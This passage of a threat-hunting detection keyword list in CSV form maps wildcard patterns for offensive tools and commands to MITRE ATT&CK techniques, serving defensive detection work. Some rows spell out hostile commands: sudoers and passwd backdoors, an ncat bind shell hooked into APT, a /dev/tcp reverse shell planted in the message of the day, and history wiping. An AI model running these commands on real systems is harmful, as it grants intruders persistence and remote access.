+"*e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*E54195F0-060C-4B24-98F2-AD9FB5351045*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z"
+"*e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e7cb9e5eaca549d918f5f048f55cf67c46e745aeccebc578eb848e46c1915719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*E82BCAD1-0D2B-4E95-B382-933CF78A8128*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*E991E6A7-31EA-42E3-A471-90F0090E3AFD*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*ea23a31a0ec1fa3ae2ff1a0bad75421cbd8d74bcfbb7abd2749eb625c918b518*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*eaphammer*","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. 
our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","10","1826","296","2023-09-17T10:13:21Z","2017-02-04T01:03:39Z"
+"*eapmd5tojohn*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*easinvoker.exe*System32*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*EasyHook-Managed*InjectionLoader.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
+"*EasyHook-Managed*WOW64Bypass.*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
+"*EasyHook-Managed/LocalHook.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development 
of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
+"*EasyPersistent.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*Ebowla-master.zip*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z"
+"*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*echo * .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*echo * /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*echo * /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*echo * > 
\\.\pipe\*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*","greyware_tool_keyword","sudoers","use SUDO without 
password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*echo *%sudo ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*","greyware_tool_keyword","sudo","Sudo Persistence via sudoers file","T1078 - T1166","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*echo */24 | dnsx -silent -resp-only -ptr*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*echo *::0:0::/root:/bin/bash* >>/etc/passwd*","greyware_tool_keyword","bash","add a passwordless user ","T1136.001 - T1059.004 - T1078.004","TA0005 - TA0002 - TA0004","N/A","N/A","Persistence","N/A","1","0","N/A","8","8","N/A","N/A","N/A","N/A"
+"*echo *APT::Update::Pre-Invoke *nohup ncat -lvp * -e /bin/bash * > /etc/apt/apt.conf.d/*","greyware_tool_keyword","bash","Backdooring APT","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*echo *bailing. 
try a different name\*","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","N/A","https://linux.die.net/man/8/tmpwatch","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*echo *bash -c *bash -i >& /dev/tcp/*/* >> /etc/update-motd.d/00-header*","greyware_tool_keyword","bash","Backdooring Message of the Day","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*echo [.ShellClassInfo] > desktop.ini*","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*echo 123 > c:\windows\temp\test.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*echo '8.8.8.8' | hakrevdns*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*echo IconResource=\\*\* >> desktop.ini*","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*echo -n 'cmd /c start rundll32 *.dll* | base64*","offensive_tool_keyword","AD exploitation cheat sheet","Generate EncodedCommand","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*echo nc -l -p * > *.bat*","greyware_tool_keyword","nc","Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*echo 'PEzor!!*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*echoac-poc-main*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*echowrecker*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*ecryptfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ecs_task_def_data/all_task_def.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*Ed1s0nZ/cool/*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as 
separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*edge_wscript_wsh_injection*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*edge1.parrot.run*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*EditC2Dialog.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*edknjdjielmpdlnllkdmaghlbpnmjmgb*","greyware_tool_keyword","Muscle VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*edraser.py -*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*EDRaser-main*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*EDRSandblast.c*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that 
weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast.exe*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandBlast.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*edrsandblast.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*EDRSandblast.sln*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast.sln*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast.vcxproj*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.exe*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_API.h*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*EDRSandblast_CLI*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast_LsassDump*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*EDRSandblast_LsassDump.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result 